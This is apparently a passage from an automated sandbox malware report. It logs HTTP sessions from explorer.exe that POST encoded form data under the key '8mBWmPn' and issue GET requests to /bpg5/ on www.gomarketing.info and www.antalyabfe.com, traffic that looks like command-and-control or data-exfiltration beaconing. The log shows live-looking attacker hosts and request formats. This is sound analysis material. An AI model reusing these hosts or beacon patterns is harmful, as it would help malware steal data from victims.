                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 5a 4e 31 53 50 70 76 38 6e 57 4b 56 48 75 41 70 4b 6b 74 44 45 57 2d 59 55 34 5f 4a 61 68 66 4d 68 78 48 7a 43 30 46 4f 59 4e 65 6f 6a 64 54 6b 63 55 66 52 31 4e 77 76 5f 49 77 61 59 73 32 6f 51 54 2d 4b 6b 32 62 63 63 4a 30 4b 53 67 73 76 6a 45 74 77 6f 35 6e 4d 4d 7a 64 6f 41 6d 51 54 4d 48 36 37 66 57 55 78 41 50 59 53 5f 51 6e 70 59 47 65 38 54 48 47 74 63 58 45 54 61 41 62 7a 59 33 2d 6a 62 57 46 46 6a 6c 64 68 46 36 42 33 6b 45 71 78 45 4e 51 4e 67 52 76 35 6a 46 79 42 4d 33 6d 70 4c 4b 61 69 50 52 41 69 32 6d 2d 31 63 64 39 76 74 78 72 6f 77 56 67 75 42 61 4c 5a 59 52 6c 4d 78 64 45 37 74 34 35 42 57 43 5f 38 57 44 31 7a 68 38 54 6a 34 7e 39 47 64 49 79 41 6d 6a 4f 35 41 68 67 74 69 42 39 59 55 57 71 55 41 42 4b 34 70 35 4b 30 66 55 37 73 46 41 78 31 64 79 46 45 52 52 54 52 78 67 6f 6c 6d 4c 2d 6f 67 7a 39 71 77 67 7a 4a 66 47 62 4f 51 5a 52 57 69 31 61 69 30 44 66 45 6a 79 6a 54 52 61 78 52 43 73 5a 71 63 4a 72 28 62 39 4c 65 59 64 77 73 67 4a 4f 30 77 4d 4c 79 78 4d 35 79 75 43 34 59 6f 73 58 75 50 43 48 7a 51 4b 30 6b 4f 4f 43 4f 7a 4f 74 62 41 54 6e 41 51 56 47 59 70 45 66 59 6f 75 73 4c 35 6b 6b 51 41 35 55 39 67 67 6b 75 30 53 42 53 6f 6a 68 55 67 6c 73 66 69 6e 72 34 56 6c 63 6a 44 55 34 30 59 46 47 30 69 37 71 53 39 65 41 33 71 51 7a 76 31 58 75 57 63 6f 67 65 4d 62 4b 33 69 65 76 78 38 37 56 33 76 41 48 5a 4d 67 57 58 56 6c 56 47 71 32 6b 78 56 28 77 49 39 55 36 51 76 6a 59 48 6f 37 34 39 73 59 49 4f 59 36 77 59 5a 56 64 76 79 63 4f 71 41 6f 78 63 4f 72 55 30 6c 45 65 34 72 6e 42 58 79 52 64 42 68 77 79 5a 74 6c 4f 70 79 50 5f 7e 6f 41 43 41 74 61 2d 79 48 4d 52 7a 36 69 55 79 53 49 58 41 44 52 44 44 78 45 35 74 45 45 5f 74 41 77 51 72 41 47 4e 59 52 62 4c 55 5a 31 39 7e 5f 6c 6a 4e 47 74 30 56 73 55 57 6a 68 67 31 49 5a 4f 77 52 54 73 31 43 62 4f 49 50 79 64 34 4f 4b 39 52 55 37 79 4e 73 4a 6f 43 52 43 68 48 34 75 28 48 79 7a 36 4a 39 56 43 30 57 70 33 76 59 43 62 39 4b 31 48 53 4e 79 4d 46 4a 66 77 44 72 67 4a 69 59 57 38 46 64 77 30 78 6b 37 5a 35 6e 48 6c 73 58 5a 79 70 59 78 67 58 28 70 61 78 52 4c 6d 57 6f 30 61 59 6f 62 34 30 63 33 7e 31 78 68 39 75 6e 5a 4e 37 36 4e 66 6a 4b 59 75 44 6e 49 67 63 30 79 7e 53 35 49 69 7a 6b 51 7a 32 35 4c 44 38 38 67 44 71 63 34 48 48 32 62 5a 63 37 74 53 79 48 68 28 76 57 4a 4a 44 71 54 30 44 46 6d 52 6b 33 6d 49 32 4c 32 4a 62 77 4c 4a 34 30 6d 63 50 72 57 68 48 75 47 67 70 31 47 78 49 68 6c 71 65 51 56 6c 6e 50 2d 30 36 37 50 5a 63 4d 66 33 62 7a 31 4b 41 56 68 62 72 63 61 57 6e 36 6d 37 36 50 31 36 38 6f 43 48 59 72 64 43 75 77 45 52 53 66 6f 49 4c 37 76 65 6f 4b 39 5a 30 63 58 37 51 72 6f 75 30 7a 72 4e 46 74 65 64 64 34 57 75 46 41 43 49 4f 63 61 68 6f 55 48 28 67 4c 34 6d 32 34 72 5a 7a 39 67 72 42 65 68 78 57 33 6e 43 6d 35 74 4a 79 74 5a 33 61 78 7a 30 32 6a 33 61 65 73 66 47 32 38 42 32 53 6e 55 77 39 52 66 39 56 72 66 37 72 79 33 65 66 62 49 61 69 67 73 57 39 79 46 57 49 66 71 36 68 6b 5a 78 63 41 30 36 78 69 52 76 70 36 52 35 7a 68 4e 69 36 78 46 66 48 45 31 37 61 6e 4a 67 6c 6d 36 6a 42 69 4b 51 4b 28 4d 65 5f 34 63 7e 78 4e 7a 69 59 6b 42 74 68 45 32 28 31 68 45 7e 30 4d 6b 68 35 6d 30 54 56 4d 32 4e 5f 61 78 47 35 69 5a 54 4a 46 65 59 67 66 77 35 33 49 54 4f 43 56 79 73 58 38 6a 78 38 59 56 78 36 43 31 32 55 4e 51 37 33 4b 58 31 77 65 65 76 72 69 70 6a 64 7a 68 36 41 4a 77 46 44 64 66 6e 74 71 4f 58 56 37 66 30 56 31 46 54 4f 75 57 71 54 36 71 7e 48 57 75 79 50 48 4d 70 77 5a 69 62 47 50 4f 48 44 30 4a 30 4e 4f 42 33 71 5a 59 42 61 79 58 4e 78 6f 35 7e 61 51 33 32 55 31 5f 32 6e 7e 46 49 4e 28 61 78 33 65 37 6f 34 30 39 69 62 6a 5f 74 6e 6f 64 7e 63 41 73 72 4a 44 61 70 59 53 41 49 68 56 50 69 44 28 7a 4f 59 37 56 70 58 44 72 6c 64 33 6e 7a 78 65 42 72 61 79 51 33 72 73 59 37 36 6c 73 66 31 75 76 4c 57 7e 75 75 30 28 31 6d 76 53 53 47 47 47 30 63 54 75 57 37 64 76 66 33 33 6f 72 36 78 74 6e 4d 4a 58 4b 48 75 6e 66 69 34 46 38 45 34 44 56 44 35 7e 78 78 65 69 78 64 66 76 38 6c 6f 56 70 52 50 64 55 31 7a 30 43 5a 71 4c 45 6f 69 35 43 6a 4f 7a 71 37 70 6b 74 28 63 7e 45 7a 47 4f 36 4b
                                                    Data Ascii: 8mBWmPn=DyoAyxbHWFxxAZN1SPpv8nWKVHuApKktDEW-YU4_JahfMhxHzC0FOYNeojdTkcUfR1Nwv_IwaYs2oQT-Kk2bccJ0KSgsvjEtwo5nMMzdoAmQTMH67fWUxAPYS_QnpYGe8THGtcXETaAbzY3-jbWFFjldhF6B3kEqxENQNgRv5jFyBM3mpLKaiPRAi2m-1cd9vtxrowVguBaLZYRlMxdE7t45BWC_8WD1zh8Tj4~9GdIyAmjO5AhgtiB9YUWqUABK4p5K0fU7sFAx1dyFERRTRxgolmL-ogz9qwgzJfGbOQZRWi1ai0DfEjyjTRaxRCsZqcJr(b9LeYdwsgJO0wMLyxM5yuC4YosXuPCHzQK0kOOCOzOtbATnAQVGYpEfYousL5kkQA5U9ggku0SBSojhUglsfinr4VlcjDU40YFG0i7qS9eA3qQzv1XuWcogeMbK3ievx87V3vAHZMgWXVlVGq2kxV(wI9U6QvjYHo749sYIOY6wYZVdvycOqAoxcOrU0lEe4rnBXyRdBhwyZtlOpyP_~oACAta-yHMRz6iUySIXADRDDxE5tEE_tAwQrAGNYRbLUZ19~_ljNGt0VsUWjhg1IZOwRTs1CbOIPyd4OK9RU7yNsJoCRChH4u(Hyz6J9VC0Wp3vYCb9K1HSNyMFJfwDrgJiYW8Fdw0xk7Z5nHlsXZypYxgX(paxRLmWo0aYob40c3~1xh9unZN76NfjKYuDnIgc0y~S5IizkQz25LD88gDqc4HH2bZc7tSyHh(vWJJDqT0DFmRk3mI2L2JbwLJ40mcPrWhHuGgp1GxIhlqeQVlnP-067PZcMf3bz1KAVhbrcaWn6m76P168oCHYrdCuwERSfoIL7veoK9Z0cX7Qrou0zrNFtedd4WuFACIOcahoUH(gL4m24rZz9grBehxW3nCm5tJytZ3axz02j3aesfG28B2SnUw9Rf9Vrf7ry3efbIaigsW9yFWIfq6hkZxcA06xiRvp6R5zhNi6xFfHE17anJglm6jBiKQK(Me_4c~xNziYkBthE2(1hE~0Mkh5m0TVM2N_axG5iZTJFeYgfw53ITOCVysX8jx8YVx6C12UNQ73KX1weevripjdzh6AJwFDdfntqOXV7f0V1FTOuWqT6q~HWuyPHMpwZibGPOHD0J0NOB3qZYBayXNxo5~aQ32U1_2n~FIN(ax3e7o409ibj_tnod~cAsrJDapYSAIhVPiD(zOY7VpXDrld3nzxeBrayQ3rsY76lsf1uvLW~uu0(1mvSSGGG0cTuW7dvf33or6xtnMJXKHunfi4F8E4DVD5~xxeixdfv8loVpRPdU1z0CZqLEoi5CjOzq7pkt(c~EzGO6Kq7oy7NtAcaHeCYFOhq1NNVyzLU9RdJLBr9JU7zXtIiXgSQfXuNdDGP9uT2QC-aCHP5fMFInTOeQbZrVvxBARxp_BZXddmQXm-UImR2ZwRGWNgFeIeS8qjrg).
                                                    May 19, 2023 17:51:32.568921089 CEST41INHTTP/1.1 404 Not Found
                                                    Date: Fri, 19 May 2023 15:51:32 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    5192.168.2.449702198.177.124.5780C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:51:35.627953053 CEST42OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.gomarketing.info
                                                    Connection: close
                                                    Content-Length: 189
                                                    Cache-Control: no-cache
                                                    Origin: http://www.gomarketing.info
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.gomarketing.info/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 61 4a 31 54 65 70 76 28 48 57 4b 57 48 75 41 6e 71 6b 76 44 45 4b 59 59 57 55 76 4a 70 52 66 4d 51 42 48 7a 77 63 46 4e 59 4e 52 77 54 64 58 67 63 55 77 52 31 4d 5a 76 36 49 77 61 5a 4d 32 72 32 58 2d 66 31 32 59 55 4d 4a 79 66 43 67 58 76 6a 5a 5a 77 6f 31 33 4d 50 7a 64 6f 47 6d 51 53 4d 58 36 78 64 4f 55 68 41 50 57 47 50 51 4b 70 59 4b 4c 38 54 58 4f 74 63 44 45 53 72 73 62 7a 4e 4c 2d 31 59 7e 46 50 44 6c 6d 31 56 37 52 6e 58 77 68 6e 57 59 35 4a 41 5a 47 38 56 6c 74 4c 4f 75 34 70 41 29 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: 8mBWmPn=DyoAyxbHWFxxAaJ1Tepv(HWKWHuAnqkvDEKYYWUvJpRfMQBHzwcFNYNRwTdXgcUwR1MZv6IwaZM2r2X-f12YUMJyfCgXvjZZwo13MPzdoGmQSMX6xdOUhAPWGPQKpYKL8TXOtcDESrsbzNL-1Y~FPDlm1V7RnXwhnWY5JAZG8VltLOu4pA).
                                                    May 19, 2023 17:51:35.907833099 CEST43INHTTP/1.1 404 Not Found
                                                    Date: Fri, 19 May 2023 15:51:35 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    6192.168.2.449703198.177.124.5780C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:51:38.339648008 CEST44OUTGET /bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q== HTTP/1.1
                                                    Host: www.gomarketing.info
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 19, 2023 17:51:38.615592003 CEST44INHTTP/1.1 404 Not Found
                                                    Date: Fri, 19 May 2023 15:51:38 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    7192.168.2.449704188.114.97.780C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:51:43.683351994 CEST47OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.antalyabfe.com
                                                    Connection: close
                                                    Content-Length: 1485
                                                    Cache-Control: no-cache
                                                    Origin: http://www.antalyabfe.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.antalyabfe.com/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 38 6d 42 57 6d 50 6e 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 56 78 65 79 75 6c 56 4b 50 56 4d 64 50 50 62 7e 6a 7a 5a 44 70 4b 77 52 6c 61 4b 76 43 57 37 69 6e 45 4c 50 5f 48 2d 6a 72 5a 56 38 7a 76 73 57 5f 4a 77 73 75 65 4a 7a 34 6f 4e 4f 49 28 4a 74 30 52 2d 4b 4a 45 7a 47 41 4d 54 57 64 57 48 53 73 54 79 34 70 6e 4d 63 44 53 35 5a 6f 49 69 65 55 7a 36 4e 6f 49 56 31 6e 4b 38 58 31 79 41 65 66 63 72 50 35 67 4c 7e 34 42 6f 41 4c 4a 6b 42 6b 4a 41 7a 4c 32 67 50 49 71 7a 76 54 4b 4d 73 72 48 33 41 69 69 79 37 43 6e 66 33 56 52 6d 38 57 7a 69 28 33 6d 6f 4a 37 41 4a 58 64 70 6d 4e 41 7e 7a 38 31 35 49 53 30 67 58 52 4d 54 55 59 33 4b 37 51 55 39 70 46 44 4d 6f 38 7a 66 52 30 7a 61 43 68 6d 4c 55 36 73 31 4b 6a 35 62 37 46 54 64 69 69 4a 47 4b 6d 59 75 68 6e 37 73 76 31 38 68 64 78 38 6d 77 7a 33 39 49 77 49 52 65 35 69 38 58 67 62 49 42 54 75 6e 2d 4d 38 6a 37 58 39 74 79 70 38 57 46 33 62 71 68 63 76 4c 4f 6d 69 6d 4a 42 61 64 31 43 58 79 6a 79 49 78 44 39 44 45 4d 28 2d 64 67 58 2d 4d 37 53 66 69 54 67 50 4e 6d 6b 50 43 56 4b 37 42 71 4a 5a 37 76 76 31 6d 42 64 75 51 35 59 59 74 39 6a 71 69 71 44 54 53 63 64 48 73 57 4f 58 65 78 42 34 37 4f 65 65 33 52 61 4b 76 59 55 51 62 5a 4c 4b 37 46 67 38 44 4d 39 7a 55 73 6d 32 4b 76 59 51 4c 4c 77 69 75 6c 62 37 68 56 41 4b 62 59 74 4a 55 34 68 69 48 7a 48 51 65 42 4e 4a 46 66 6a 48 74 4d 77 59 74 45 79 6c 6f 62 65 4a 71 49 6f 71 66 75 4f 44 43 4d 7a 38 53 50 74 34 36 31 47 79 6c 59 7a 79 66 67 56 56 67 74 4a 73 46 50 33 6c 67 37 46 54 42 53 71 72 63 37 4d 51 45 37 66 77 55 7a 64 31 44 72 6b 6f 6a 4a 54 46 65 33 4d 50 34 6b 7e 38 51 59 4d 38 32 39 73 76 71 59 4a 37 5a 74 4b 66 77 6b 6b 31 71 6b 42 48 4e 71 4c 39 68 42 50 6c 79 70 79 5a 6c 31 39 5f 59 62 6e 64 48 61 70 51 4f 59 33 38 72 77 31 75 28 70 79 49 66 66 31 64 62 6b 6a 4a 6f 48 69 79 63 32 73 35 49 71 33 56 61 37 4e 48 6a 75 75 31 59 78 61 73 49 36 4e 50 51 53 52 62 49 48 76 65 30 79 6d 74 73 6c 4b 62 28 52 6d 33 30 6d 37 45 4f 62 36 4e 33 43 51 51 44 44 64 79 35 63 41 35 78 55 70 31 6d 66 4b 6d 70 34 28 6c 7a 61 58 4d 77 58 77 7a 34 45 57 55 56 41 73 55 63 44 78 33 41 47 45 4e 39 44 42 5f 4c 30 32 4b 7a 74 36 48 44 62 4e 57 5a 62 4c 32 32 51 54 77 48 38 7e 39 36 70 78 62 72 61 46 38 7a 76 70 5a 30 41 37 47 65 61 45 76 61 4e 58 59 49 53 4c 77 58 43 56 45 4b 48 48 64 64 39 31 66 79 71 51 63 65 51 72 6d 78 35 51 42 77 75 6c 54 4d 70 44 6f 57 52 38 62 7a 5a 35 73 74 34 45 59 71 38 61 66 68 57 5a 54 55 73 44 68 63 64 33 30 61 76 35 66 58 70 69 67 76 58 6d 53 39 44 4d 4d 63 46 32 56 4d 2d 61 54 4d 63 36 67 7a 6d 6e 69 6d 49 51 34 66 4c 56 65 71 79 70 61 71 72 63 70 65 63 30 49 44 52 74 5a 54 71 73 59 46 44 35 54 7a 48 56 32 44 4e 69 69 42 6a 36 30 66 54 77 5a 50 74 56 71 72 5a 6a 30 56 54 54 53 43 70 4d 2d 49 47 76 6b 37 36 50 38 41 68 47 4f 6d 31 7e 4f 6f 70 65 39 7e 65 73 76 7e 67 71 32 58 69 76 67 66 32 79 56 71 6d 6f 49 56 79 7a 50 73 77 35 47 6f 31 6f 74 54 31 31 6e 34 6d 69 7a 4a 39 6e 61 6a 71 77 78 77 4d 58 45 39 38 49 36 7e 36 41 5a 4b 52 56 64 43 55 47 32 6d 4f 6e 6c 57 74 64 2d 32 42 7a 76 62 72 45 67 4d 6f 56 37 6f 6b 42 6e 73 35 46 50 33 37 53 4b 6c 76 68 57 47 6c 64 54 73 56 67 48 68 58 72 63 6f 73 5a 6d 30 48 78 39 46 34 66 6e 52 2d 78 2d 59 37 64 64 47 70 4e 45 28 78 74 4c 67 4a 38 2d 4a 79 33 46 53 5f 70 7a 71 35 61 38 43 54 54 79 63 42 37 35 47 62 33 32 4f 73 75 62 70 32 28 78 71 7a 47 77 33 6e 64 7a 4b 62 64 58 48 31 79 43 57 30 79 58 5a 52 6e 51 44 53 6a 5a 78 6d 36 71 76 35 61 47 6d 44 31 78 4a 46 38 6a 4f 72 74 6e 48 64 54 50 54 58 75 72 45 64 41 4b 5a 59 6f 67 75 4a 37 70 54 6c 46 47 56 30 63 49 4a 6f 6a 4a 61 33 7e 4a 49 65 7a 4f 67 66 48 71 52 71 53 4c 76 66 6e 4d 56 39 6c 4d 47 4c 61 70 49 4f 35 4d 54 56 43 30 57 5a 4a 54 55 6a 38 4a 46 33 71 49 71 47 71 4f 69 46 31 34 62 44 64 72 33 4b 67 42 58 59 48 6d 7a 53 43 35 4f 7a 4c 4c 31 70 38 35 67 74 4e 34 65 61 45 32 4a 51 68 4e 7a 48 39 61 4d 62 72 4a 4e 51 6f 50 41 58 68 57 73 46 76 35 6e 52 70 54 77 35 32 39 37 48 53 48 79 73 47 44 62 53 31 6e 59 69 33 49 49 4c 67 6a 68 34 54 48 35 36 4c 5a 6c 77 71 4d 7a 51 6c 59 62 4a 4d 65 45 6e 69 72 46
                                                    Data Ascii: 8mBWmPn=8GpXORSvCn1_kVxeyulVKPVMdPPb~jzZDpKwRlaKvCW7inELP_H-jrZV8zvsW_JwsueJz4oNOI(Jt0R-KJEzGAMTWdWHSsTy4pnMcDS5ZoIieUz6NoIV1nK8X1yAefcrP5gL~4BoALJkBkJAzL2gPIqzvTKMsrH3Aiiy7Cnf3VRm8Wzi(3moJ7AJXdpmNA~z815IS0gXRMTUY3K7QU9pFDMo8zfR0zaChmLU6s1Kj5b7FTdiiJGKmYuhn7sv18hdx8mwz39IwIRe5i8XgbIBTun-M8j7X9typ8WF3bqhcvLOmimJBad1CXyjyIxD9DEM(-dgX-M7SfiTgPNmkPCVK7BqJZ7vv1mBduQ5YYt9jqiqDTScdHsWOXexB47Oee3RaKvYUQbZLK7Fg8DM9zUsm2KvYQLLwiulb7hVAKbYtJU4hiHzHQeBNJFfjHtMwYtEylobeJqIoqfuODCMz8SPt461GylYzyfgVVgtJsFP3lg7FTBSqrc7MQE7fwUzd1DrkojJTFe3MP4k~8QYM829svqYJ7ZtKfwkk1qkBHNqL9hBPlypyZl19_YbndHapQOY38rw1u(pyIff1dbkjJoHiyc2s5Iq3Va7NHjuu1YxasI6NPQSRbIHve0ymtslKb(Rm30m7EOb6N3CQQDDdy5cA5xUp1mfKmp4(lzaXMwXwz4EWUVAsUcDx3AGEN9DB_L02Kzt6HDbNWZbL22QTwH8~96pxbraF8zvpZ0A7GeaEvaNXYISLwXCVEKHHdd91fyqQceQrmx5QBwulTMpDoWR8bzZ5st4EYq8afhWZTUsDhcd30av5fXpigvXmS9DMMcF2VM-aTMc6gzmnimIQ4fLVeqypaqrcpec0IDRtZTqsYFD5TzHV2DNiiBj60fTwZPtVqrZj0VTTSCpM-IGvk76P8AhGOm1~Oope9~esv~gq2Xivgf2yVqmoIVyzPsw5Go1otT11n4mizJ9najqwxwMXE98I6~6AZKRVdCUG2mOnlWtd-2BzvbrEgMoV7okBns5FP37SKlvhWGldTsVgHhXrcosZm0Hx9F4fnR-x-Y7ddGpNE(xtLgJ8-Jy3FS_pzq5a8CTTycB75Gb32Osubp2(xqzGw3ndzKbdXH1yCW0yXZRnQDSjZxm6qv5aGmD1xJF8jOrtnHdTPTXurEdAKZYoguJ7pTlFGV0cIJojJa3~JIezOgfHqRqSLvfnMV9lMGLapIO5MTVC0WZJTUj8JF3qIqGqOiF14bDdr3KgBXYHmzSC5OzLL1p85gtN4eaE2JQhNzH9aMbrJNQoPAXhWsFv5nRpTw5297HSHysGDbS1nYi3IILgjh4TH56LZlwqMzQlYbJMeEnirFVmpaJAq4erLl9eLD2Yy4_D4cQMeewFS2Wwjz2IXB8ZLm7aNe3OCfPXdU5XAyW0G1hoi(4IVH86oW33CoX3aT-v8~0rNr0Py5FOrfwVVdDmENxsDNmIcSfnQ).
                                                    May 19, 2023 17:51:43.708944082 CEST48INHTTP/1.1 301 Moved Permanently
                                                    Date: Fri, 19 May 2023 15:51:43 GMT
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=3600
                                                    Expires: Fri, 19 May 2023 16:51:43 GMT
                                                    Location: https://www.antalyabfe.com/bpg5/
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lvdXIURmZABybj0ApXtfGM6a2V0nbcLfPQ9fjwYZzKlW4DcbsiGjBnQxu%2BMBsM06N8ri4r7Ifik964J6BT%2BlA5Fe2c5FQjVtFRd7KgzvIgi5cbWDXhmARkG63H%2FixBOur1yZfsA%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Vary: Accept-Encoding
                                                    Server: cloudflare
                                                    CF-RAY: 7c9d80c1f9b435f6-FRA
                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    8192.168.2.449705188.114.97.780C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
